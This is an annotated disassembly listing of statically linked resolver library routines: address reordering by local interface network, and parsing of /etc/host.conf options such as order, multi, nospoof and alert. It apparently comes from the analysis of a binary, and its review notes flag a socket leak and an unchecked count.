; (891Bh, SIOCGIFNETMASK) and the address (8915h, SIOCGIFADDR). Each
; interface with a non-zero (address AND mask) gets an 18h-byte entry in the
; table at unk_80792C0: name at +0, network at +10h, mask at +14h.
; dword_8078524 then holds the number of entries.
; Phase 2: walk the NULL-terminated pointer list at [arg_0+10h]; the first
; 4-byte address that falls on one of the recorded networks is swapped with
; the first address in the list.
;
; NOTE(review): offset 10h matches h_addr_list of a struct hostent and the
; logic matches a resolver "reorder" option, so this is presumably
; statically linked library code. Interface-enumeration ioctls seen in a
; trace of this binary may therefore come from name resolution; confirm
; through the callers before attributing them to the sample's own logic.
; NOTE(review): if the SIOCGIFCONF ioctl fails, the function returns without
; closing the socket (close is only reached at loc_804A8DB).
; NOTE(review): when phase 1 records no interface, dword_8078524 is still -1
; at loc_804A8DB; the check there only returns on 0, so phase 2 would start
; with a count of -1. Verify against the data actually seen at run time.
reorder_addrs proc near ; CODE XREF: sub_804BEB0+5Ep ; sub_804BEB0+90p ...
var_174 = byte ptr -174h
var_168 = dword ptr -168h ; pointer to the current interface record
var_164 = dword ptr -164h ; pointer to the record's address family (unrolled loop)
var_160 = dword ptr -160h ; pointer to the record's address field (unrolled loop)
var_15C = dword ptr -15Ch ; same as var_164
var_158 = dword ptr -158h ; same as var_160
var_154 = dword ptr -154h ; number of interface records left
var_150 = dword ptr -150h ; socket descriptor
var_14C = byte ptr -14Ch ; 4-byte temporary used for the swap
var_148 = dword ptr -148h ; buffer length passed to / returned by SIOCGIFCONF
var_144 = dword ptr -144h ; buffer pointer passed to SIOCGIFCONF
var_140 = byte ptr -140h ; 140h-byte buffer for the interface records
arg_0 = dword ptr 8
    push ebp
    mov ebp, esp
    sub esp, 168h
    push edi
    push esi
    push ebx
    cmp dword_8078524, 0
    jz loc_804A9C9 ; count is 0: nothing to do
    cmp [ebp+arg_0], 0
    jz loc_804A9C9 ; NULL argument
    cmp dword_8078524, 0FFFFFFFFh
    jnz loc_804A8F7 ; table already built: go to phase 2
; ---- Phase 1: build the interface table ----
    push 0
    push 1
    push 2
    call socket ; socket(2, 1, 0)
    mov [ebp+var_150], eax
    add esp, 0Ch
    cmp eax, 0FFFFFFFFh
    jz loc_804A9C9
    mov [ebp+var_148], 140h ; buffer length
    lea edi, [ebp+var_140]
    mov [ebp+var_144], edi ; buffer pointer
    lea eax, [ebp+var_148]
    push eax
    push 8912h ; SIOCGIFCONF
    mov edi, [ebp+var_150]
    push edi
    call ioctl
    add esp, 0Ch
    cmp eax, 0FFFFFFFFh
    jz loc_804A9C9 ; returns with the socket still open
    mov edi, [ebp+var_148]
    shr edi, 5 ; returned length / 20h = number of records
    mov [ebp+var_154], edi
    mov ds:dword_80793B0, offset unk_80792C0 ; table cursor = start of table
    mov edi, [ebp+var_144]
    mov [ebp+var_168], edi
    cmp [ebp+var_154], 0
    jz loc_804A8DB
    mov ebx, edi
    add ebx, 14h ; ebx = address field of the first record
; The loop body below appears three times: once for an odd leading record,
; then twice per iteration of the main loop (unrolled by two).
    mov eax, [ebp+var_154]
    and eax, 1
    cmp [ebp+var_154], 0
    jle short loc_804A6A4
    test eax, eax
    jz loc_804A747 ; even count: skip the single leading pass
loc_804A6A4: ; CODE XREF: reorder_addrs+CEj
    mov edi, [ebp+var_168]
    push edi
    mov eax, ds:dword_80793B0
    push eax
    call strcpy ; copy the interface name into the table entry
    push edi
    push 891Bh ; SIOCGIFNETMASK
    mov edi, [ebp+var_150]
    push edi
    call ioctl
    add esp, 14h ; cleans up both the strcpy and the ioctl arguments
    cmp eax, 0FFFFFFFFh
    jz short loc_804A731
    cmp word ptr [ebx-4], 2 ; address family must be 2
    jnz short loc_804A731
    mov esi, [ebx] ; esi = netmask
    mov edi, [ebp+var_168]
    push edi
    push 8915h ; SIOCGIFADDR
    mov edi, [ebp+var_150]
    push edi
    call ioctl
    add esp, 0Ch
    cmp eax, 0FFFFFFFFh
    jz short loc_804A731
    cmp word ptr [ebx-4], 2
    jnz short loc_804A731
    mov edx, [ebx]
    and edx, esi ; edx = address AND netmask
    jz short loc_804A731 ; zero network: do not record
    mov eax, ds:dword_80793B0
    mov [eax+10h], edx ; entry.network
    mov [eax+14h], esi ; entry.mask
    cmp dword_8078524, 0FFFFFFFFh
    jnz short loc_804A724
    mov dword_8078524, 0 ; first entry: start counting from 0
loc_804A724: ; CODE XREF: reorder_addrs+14Cj
    add ds:dword_80793B0, 18h ; advance the table cursor
    inc dword_8078524
loc_804A731: ; CODE XREF: reorder_addrs+102j ; reorder_addrs+109j ...
    add ebx, 20h
    add [ebp+var_168], 20h ; next record
    dec [ebp+var_154]
    jz loc_804A8DB
loc_804A747: ; CODE XREF: reorder_addrs+D2j
    mov [ebp+var_158], ebx
    lea edi, [ebx-4]
    mov [ebp+var_15C], edi
    mov [ebp+var_160], ebx
    mov [ebp+var_164], edi
    lea esi, [esi] ; no-op (alignment padding)
; Main loop, first of two records per iteration.
loc_804A764: ; CODE XREF: reorder_addrs+309j
    mov edi, [ebp+var_168]
    push edi
    mov eax, ds:dword_80793B0
    push eax
    call strcpy
    push edi
    push 891Bh ; SIOCGIFNETMASK
    mov edi, [ebp+var_150]
    push edi
    call ioctl
    add esp, 14h
    cmp eax, 0FFFFFFFFh
    jz short loc_804A807
    mov edi, [ebp+var_164]
    cmp word ptr [edi], 2
    jnz short loc_804A807
    mov edi, [ebp+var_160]
    mov ebx, [edi] ; ebx = netmask
    mov edi, [ebp+var_168]
    push edi
    push 8915h ; SIOCGIFADDR
    mov edi, [ebp+var_150]
    push edi
    call ioctl
    add esp, 0Ch
    cmp eax, 0FFFFFFFFh
    jz short loc_804A807
    mov edi, [ebp+var_15C]
    cmp word ptr [edi], 2
    jnz short loc_804A807
    mov edi, [ebp+var_158]
    mov edx, [edi]
    and edx, ebx
    jz short loc_804A807
    mov eax, ds:dword_80793B0
    mov [eax+10h], edx
    mov [eax+14h], ebx
    cmp dword_8078524, 0FFFFFFFFh
    jnz short loc_804A7FA
    mov dword_8078524, 0
loc_804A7FA: ; CODE XREF: reorder_addrs+222j
    add ds:dword_80793B0, 18h
    inc dword_8078524
; Second record of the pair: same steps at offset +20h.
loc_804A807: ; CODE XREF: reorder_addrs+1C2j ; reorder_addrs+1CEj ...
    mov ebx, [ebp+var_168]
    add ebx, 20h
    push ebx
    mov eax, ds:dword_80793B0
    push eax
    call strcpy
    push ebx
    push 891Bh ; SIOCGIFNETMASK
    mov edi, [ebp+var_150]
    push edi
    call ioctl
    add esp, 14h
    cmp eax, 0FFFFFFFFh
    jz short loc_804A8AB
    mov edi, [ebp+var_164]
    cmp word ptr [edi+20h], 2
    jnz short loc_804A8AB
    mov edi, [ebp+var_160]
    mov esi, [edi+20h] ; esi = netmask
    push ebx
    push 8915h ; SIOCGIFADDR
    mov edi, [ebp+var_150]
    push edi
    call ioctl
    add esp, 0Ch
    cmp eax, 0FFFFFFFFh
    jz short loc_804A8AB
    mov edi, [ebp+var_15C]
    cmp word ptr [edi+20h], 2
    jnz short loc_804A8AB
    mov edi, [ebp+var_158]
    mov edx, [edi+20h]
    and edx, esi
    jz short loc_804A8AB
    mov eax, ds:dword_80793B0
    mov [eax+10h], edx
    mov [eax+14h], esi
    cmp dword_8078524, 0FFFFFFFFh
    jnz short loc_804A89E
    mov dword_8078524, 0
loc_804A89E: ; CODE XREF: reorder_addrs+2C6j
    add ds:dword_80793B0, 18h
    inc dword_8078524
loc_804A8AB: ; CODE XREF: reorder_addrs+268j ; reorder_addrs+275j ...
    add [ebp+var_158], 40h ; advance all record pointers by two records
    add [ebp+var_15C], 40h
    add [ebp+var_160], 40h
    add [ebp+var_164], 40h
    add [ebp+var_168], 40h
    add [ebp+var_154], 0FFFFFFFEh ; remaining -= 2
    jnz loc_804A764
loc_804A8DB: ; CODE XREF: reorder_addrs+B3j ; reorder_addrs+175j
    mov edi, [ebp+var_150]
    push edi
    call close
    add esp, 4
    cmp dword_8078524, 0
    jz loc_804A9C9 ; only a count of exactly 0 returns here
; ---- Phase 2: look for an address on a recorded network ----
loc_804A8F7: ; CODE XREF: reorder_addrs+2Aj
    mov edi, [ebp+arg_0]
    mov ebx, [edi+10h] ; ebx = cursor into the address pointer list
    test ebx, ebx
    jz loc_804A9C9
    lea esi, [ebp+var_14C] ; esi = swap temporary
    nop
loc_804A90C: ; CODE XREF: reorder_addrs+3F7j
    cmp dword ptr [ebx], 0
    jz loc_804A9C9 ; end of list, no match
    mov ds:dword_80793B0, offset unk_80792C0 ; restart at the first table entry
    mov ecx, dword_8078524 ; ecx = entries left to test
    test ecx, ecx
    jz loc_804A9C0
    mov eax, ecx
    and eax, 1
    test ecx, ecx
    jle short loc_804A93A
    test eax, eax
    jz short loc_804A958 ; even count: skip the single leading test
loc_804A93A: ; CODE XREF: reorder_addrs+368j
    mov eax, [ebx]
    mov edx, ds:dword_80793B0
    mov eax, [eax] ; eax = the 4-byte address
    and eax, [edx+14h] ; apply the entry's mask
    cmp [edx+10h], eax ; same network?
    jz short loc_804A983
    add ds:dword_80793B0, 18h
    dec ecx
    jz short loc_804A9C0
    lea esi, [esi] ; no-op (alignment padding)
loc_804A958: ; CODE XREF: reorder_addrs+36Cj ; reorder_addrs+3F2j
    mov eax, [ebx]
    mov edx, ds:dword_80793B0
    mov eax, [eax]
    and eax, [edx+14h]
    cmp [edx+10h], eax
    jz short loc_804A983
    add ds:dword_80793B0, 18h
    mov eax, [ebx]
    mov edx, ds:dword_80793B0
    mov eax, [eax]
    and eax, [edx+14h]
    cmp [edx+10h], eax
    jnz short loc_804A9B4
; Match: swap the first address in the list with the matching one using
; three 4-byte bcopy(src, dst, 4) calls through the temporary at var_14C.
loc_804A983: ; CODE XREF: reorder_addrs+37Ej ; reorder_addrs+39Cj
    push 4
    push esi
    mov edi, [ebp+arg_0]
    mov eax, [edi+10h]
    mov eax, [eax]
    push eax
    call bcopy ; temporary <- first address
    push 4
    mov eax, [edi+10h]
    mov eax, [eax]
    push eax
    mov eax, [ebx]
    push eax
    call bcopy ; first address <- matching address
    push 4
    mov eax, [ebx]
    push eax
    push esi
    call bcopy ; matching address <- temporary
    jmp short loc_804A9C9 ; done after the first match
; ---------------------------------------------------------------------------
    db 8Dh, 76h, 0 ; alignment padding
; ---------------------------------------------------------------------------
loc_804A9B4: ; CODE XREF: reorder_addrs+3B5j
    add ds:dword_80793B0, 18h
    add ecx, 0FFFFFFFEh ; two entries tested per pass
    jnz short loc_804A958
loc_804A9C0: ; CODE XREF: reorder_addrs+35Bj ; reorder_addrs+388j
    add ebx, 4 ; next address in the list
    jnz loc_804A90C ; taken unless ebx wraps to 0; the NULL test at loc_804A90C ends the loop
loc_804A9C9: ; CODE XREF: reorder_addrs+13j ; reorder_addrs+1Dj ...
    lea esp, [ebp+var_174] ; also discards the un-popped bcopy arguments
    pop ebx
    pop esi
    pop edi
    mov esp, ebp
    pop ebp
    retn
reorder_addrs endp
; ---------------------------------------------------------------------------
    db 8Dh, 36h ; alignment padding
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
init_services_resolv proc near ; CODE XREF: sub_804BEB0+Fp ; gethostbyname+E1p ...
var_420 = byte ptr -420h var_414 = dword ptr -414h var_410 = dword ptr -410h var_40C = dword ptr -40Ch var_408 = dword ptr -408h var_404 = dword ptr -404h var_400 = byte ptr -400h var_3FC = byte ptr -3FCh var_3FB = byte ptr -3FBh var_3F9 = byte ptr -3F9h push ebp mov ebp, esp sub esp, 414h push edi push esi push ebx xor esi, esi mov [ebp+var_408], offset unk_807A358 call sub_805E954 push offset aResolv_host_co ; "RESOLV_HOST_CONF" call secure_getenv mov [ebp+var_40C], eax add esp, 4 test eax, eax jnz short loc_804AA16 mov [ebp+var_40C], offset aEtcHost_conf ; "/etc/host.conf" loc_804AA16: ; CODE XREF: init_services_resolv+32j push offset aR ; "r" mov eax, [ebp+var_40C] push eax call fopen mov [ebp+var_404], eax add esp, 8 test eax, eax jnz short loc_804AA50 mov ds:dword_8079DD4, 1 mov ds:dword_8079DD8, 0 jmp loc_804B436 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AA50: ; CODE XREF: init_services_resolv+5Aj lea ecx, [ebp+var_400] mov [ebp+var_410], ecx loc_804AA5C: ; CODE XREF: init_services_resolv+CAj ; init_services_resolv+EFj ... 
mov eax, [ebp+var_404] push eax push 400h mov ecx, [ebp+var_410] push ecx call fgets mov edx, eax add esp, 0Ch test edx, edx jz loc_804B41C push 0Ah mov eax, [ebp+var_410] push eax call sub_8057BE8 mov ebx, eax add esp, 8 test ebx, ebx jz short loc_804AA9B mov byte ptr [ebx], 0 loc_804AA9B: ; CODE XREF: init_services_resolv+BEj cmp [ebp+var_400], 23h jz short loc_804AA5C lea ebx, [ebp+var_400] cmp [ebp+var_400], 0 jz short loc_804AACE mov edx, dword_8078FA0 db 8Dh,76h,0 ; lea esi, [esi+0] loc_804AABC: ; CODE XREF: init_services_resolv+F4j movzx eax, byte ptr [ebx] test byte ptr [edx+eax*2+1], 20h jz short loc_804AACE inc ebx jz short loc_804AA5C cmp byte ptr [ebx], 0 jnz short loc_804AABC loc_804AACE: ; CODE XREF: init_services_resolv+D9j ; init_services_resolv+ECj test ebx, ebx jz short loc_804AA5C cmp byte ptr [ebx], 0 jz short loc_804AA5C mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb mov edx, ecx not edx mov [ebp+var_414], edx push edx push ebx mov eax, [ebp+var_410] push eax call sub_8056570 push 5 push offset aOrder ; "order" mov ecx, [ebp+var_410] push ecx call checkbuf mov edx, eax add esp, 18h test edx, edx jnz loc_804AD64 cmp [ebp+var_3FB], 0 jz short loc_804AB3B movzx edx, [ebp+var_3FB] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz loc_804AD64 loc_804AB3B: ; CODE XREF: init_services_resolv+14Aj push offset asc_806791B ; " \t" mov eax, [ebp+var_410] push eax call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz short loc_804AB5B cmp byte ptr [ebx+1], 0 jnz short loc_804AB7D loc_804AB5B: ; CODE XREF: init_services_resolv+17Bj push offset aOrder ; "order" mov ecx, [ebp+var_40C] push ecx push offset aResolvSSComman ; "resolv+: %s: \"%s\" command incorrectly f"... 
push 0Ch push 0Bh mov eax, dword_8078F9C push eax jmp loc_804B3AC ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804AB7C: ; CODE XREF: init_services_resolv+1A8j ; init_services_resolv+1ADj inc ebx loc_804AB7D: ; CODE XREF: init_services_resolv+181j ; init_services_resolv+321j cmp byte ptr [ebx], 20h jz short loc_804AB7C cmp byte ptr [ebx], 9 jz short loc_804AB7C push offset asc_8067950 ; " ,;:" push ebx call strpbrk mov edi, eax add esp, 8 test edi, edi jz short loc_804AB9E mov byte ptr [edi], 0 loc_804AB9E: ; CODE XREF: init_services_resolv+1C1j push 4 push offset aBind ; "bind" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804ABEC cmp byte ptr [ebx+4], 0 jz short loc_804ABC8 movzx edx, byte ptr [ebx+4] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804ABEC loc_804ABC8: ; CODE XREF: init_services_resolv+1DEj mov ds:dword_8079DD4[esi*4], 1 inc esi test byte ptr dword_807854C, 1 jnz loc_804ACF0 call res_init jmp loc_804ACF0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804ABEC: ; CODE XREF: init_services_resolv+1D8j ; init_services_resolv+1EEj push 5 push offset aHosts ; "hosts" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804AC28 cmp byte ptr [ebx+5], 0 jz short loc_804AC16 movzx edx, byte ptr [ebx+5] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804AC28 loc_804AC16: ; CODE XREF: init_services_resolv+22Cj mov ds:dword_8079DD4[esi*4], 2 inc esi jmp loc_804ACF0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804AC28: ; CODE XREF: init_services_resolv+226j ; init_services_resolv+23Cj push 3 push offset aNis ; "nis" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804AC64 cmp byte ptr [ebx+3], 0 jz short loc_804AC52 movzx edx, byte ptr [ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804AC64 loc_804AC52: ; CODE XREF: init_services_resolv+268j mov ds:dword_8079DD4[esi*4], 3 inc esi jmp loc_804ACF0 ; 
陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804AC64: ; CODE XREF: init_services_resolv+262j ; init_services_resolv+278j push offset aOrder ; "order" mov ecx, [ebp+var_40C] push ecx push offset aResolvSSComman ; "resolv+: %s: \"%s\" command incorrectly f"... push 0Ch push 0Bh mov eax, dword_8078F9C push eax call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf push ebx push offset aResolvSIsAnInv ; "resolv+: \"%s\" is an invalid keyword\n" push 0Dh push 0Bh mov ecx, dword_8078F9C push ecx call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf push offset aNis ; "nis" push offset aHosts ; "hosts" push offset aBind ; "bind" push offset aResolvValidKey ; "resolv+: valid keywords are: %s, %s and"... push 0Eh push 0Bh mov eax, dword_8078F9C push eax call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf add esp, 30h loc_804ACF0: ; CODE XREF: init_services_resolv+203j ; init_services_resolv+20Ej ... test edi, edi jz short loc_804ACFF lea ebx, [edi+1] test ebx, ebx jnz loc_804AB7D loc_804ACFF: ; CODE XREF: init_services_resolv+31Aj test esi, esi jnz loc_804AA5C push offset aOrder ; "order" mov ecx, [ebp+var_40C] push ecx push offset aResolvSSComman ; "resolv+: %s: \"%s\" command incorrectly f"... push 0Ch push 0Bh mov eax, dword_8078F9C push eax call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf push offset aResolvSearchOr ; "resolv+: search order not specified or "... 
push 0Fh push 0Bh mov ecx, dword_8078F9C push ecx call catgets mov edx, eax push edx push offset unk_80787A4 call fprintf add esp, 28h jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AD64: ; CODE XREF: init_services_resolv+13Dj ; init_services_resolv+15Dj push 5 push offset aMulti ; "multi" mov eax, [ebp+var_410] push eax call checkbuf mov edx, eax add esp, 0Ch test edx, edx jnz loc_804AEA8 cmp [ebp+var_3FB], 0 jz short loc_804ADA4 movzx edx, [ebp+var_3FB] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz loc_804AEA8 loc_804ADA4: ; CODE XREF: init_services_resolv+3B3j push offset asc_806791B ; " \t" mov ecx, [ebp+var_410] push ecx call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz loc_804AE9C cmp byte ptr [ebx], 0 jz short loc_804ADE6 mov edx, dword_8078FA0 db 8Dh,76h,0 ; lea esi, [esi+0] loc_804ADD0: ; CODE XREF: init_services_resolv+40Cj movzx eax, byte ptr [ebx] test byte ptr [edx+eax*2+1], 20h jz short loc_804ADE6 inc ebx jz loc_804AE9C cmp byte ptr [ebx], 0 jnz short loc_804ADD0 loc_804ADE6: ; CODE XREF: init_services_resolv+3EDj ; init_services_resolv+400j test ebx, ebx jz loc_804AE9C cmp byte ptr [ebx], 0 jz loc_804AE9C mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFCh jnz short loc_804AE44 push 2 push offset aOn ; "on" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804AE44 cmp byte ptr [ebx+2], 0 jz short loc_804AE32 movzx edx, byte ptr [ebx+2] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804AE44 loc_804AE32: ; CODE XREF: init_services_resolv+448j mov dword_8078510, 1 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AE44: ; CODE XREF: init_services_resolv+42Ej ; init_services_resolv+442j ... 
mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFBh jnz short loc_804AE90 push 3 push offset aOff ; "off" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804AE90 cmp byte ptr [ebx+3], 0 jz short loc_804AE7F movzx edx, byte ptr [ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804AE90 loc_804AE7F: ; CODE XREF: init_services_resolv+495j mov dword_8078510, 0 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AE90: ; CODE XREF: init_services_resolv+47Bj ; init_services_resolv+48Fj ... push offset aMulti ; "multi" jmp loc_804B261 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AE9C: ; CODE XREF: init_services_resolv+3E4j ; init_services_resolv+403j ... push offset aMulti ; "multi" jmp loc_804B395 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AEA8: ; CODE XREF: init_services_resolv+3A6j ; init_services_resolv+3C6j push 7 push offset aNospoof ; "nospoof" mov eax, [ebp+var_410] push eax call checkbuf mov edx, eax add esp, 0Ch test edx, edx jnz loc_804AFEC cmp [ebp+var_3F9], 0 jz short loc_804AEE8 movzx edx, [ebp+var_3F9] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz loc_804AFEC loc_804AEE8: ; CODE XREF: init_services_resolv+4F7j push offset asc_806791B ; " \t" mov ecx, [ebp+var_410] push ecx call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz loc_804AFE0 cmp byte ptr [ebx], 0 jz short loc_804AF2A mov edx, dword_8078FA0 db 8Dh,76h,0 ; lea esi, [esi+0] loc_804AF14: ; CODE XREF: init_services_resolv+550j movzx eax, byte ptr [ebx] test byte ptr [edx+eax*2+1], 20h jz short loc_804AF2A inc ebx jz loc_804AFE0 cmp byte ptr [ebx], 0 jnz short loc_804AF14 loc_804AF2A: ; CODE XREF: init_services_resolv+531j ; init_services_resolv+544j test ebx, ebx jz loc_804AFE0 cmp byte ptr [ebx], 0 jz loc_804AFE0 mov edi, ebx xor al, al cld mov 
ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFCh jnz short loc_804AF88 push 2 push offset aOn ; "on" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804AF88 cmp byte ptr [ebx+2], 0 jz short loc_804AF76 movzx edx, byte ptr [ebx+2] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804AF88 loc_804AF76: ; CODE XREF: init_services_resolv+58Cj mov dword_8078514, 1 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AF88: ; CODE XREF: init_services_resolv+572j ; init_services_resolv+586j ... mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFBh jnz short loc_804AFD4 push 3 push offset aOff ; "off" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804AFD4 cmp byte ptr [ebx+3], 0 jz short loc_804AFC3 movzx edx, byte ptr [ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804AFD4 loc_804AFC3: ; CODE XREF: init_services_resolv+5D9j mov dword_8078514, 0 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AFD4: ; CODE XREF: init_services_resolv+5BFj ; init_services_resolv+5D3j ... push offset aNospoof ; "nospoof" jmp loc_804B261 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AFE0: ; CODE XREF: init_services_resolv+528j ; init_services_resolv+547j ... 
push offset aNospoof ; "nospoof" jmp loc_804B395 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AFEC: ; CODE XREF: init_services_resolv+4EAj ; init_services_resolv+50Aj push 5 push offset aAlert ; "alert" mov eax, [ebp+var_410] push eax call checkbuf mov edx, eax add esp, 0Ch test edx, edx jnz loc_804B130 cmp [ebp+var_3FB], 0 jz short loc_804B02C movzx edx, [ebp+var_3FB] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz loc_804B130 loc_804B02C: ; CODE XREF: init_services_resolv+63Bj push offset asc_806791B ; " \t" mov ecx, [ebp+var_410] push ecx call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz loc_804B124 cmp byte ptr [ebx], 0 jz short loc_804B06E mov edx, dword_8078FA0 db 8Dh,76h,0 ; lea esi, [esi+0] loc_804B058: ; CODE XREF: init_services_resolv+694j movzx eax, byte ptr [ebx] test byte ptr [edx+eax*2+1], 20h jz short loc_804B06E inc ebx jz loc_804B124 cmp byte ptr [ebx], 0 jnz short loc_804B058 loc_804B06E: ; CODE XREF: init_services_resolv+675j ; init_services_resolv+688j test ebx, ebx jz loc_804B124 cmp byte ptr [ebx], 0 jz loc_804B124 mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFCh jnz short loc_804B0CC push 2 push offset aOn ; "on" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B0CC cmp byte ptr [ebx+2], 0 jz short loc_804B0BA movzx edx, byte ptr [ebx+2] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B0CC loc_804B0BA: ; CODE XREF: init_services_resolv+6D0j mov dword_8078518, 1 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B0CC: ; CODE XREF: init_services_resolv+6B6j ; init_services_resolv+6CAj ... 
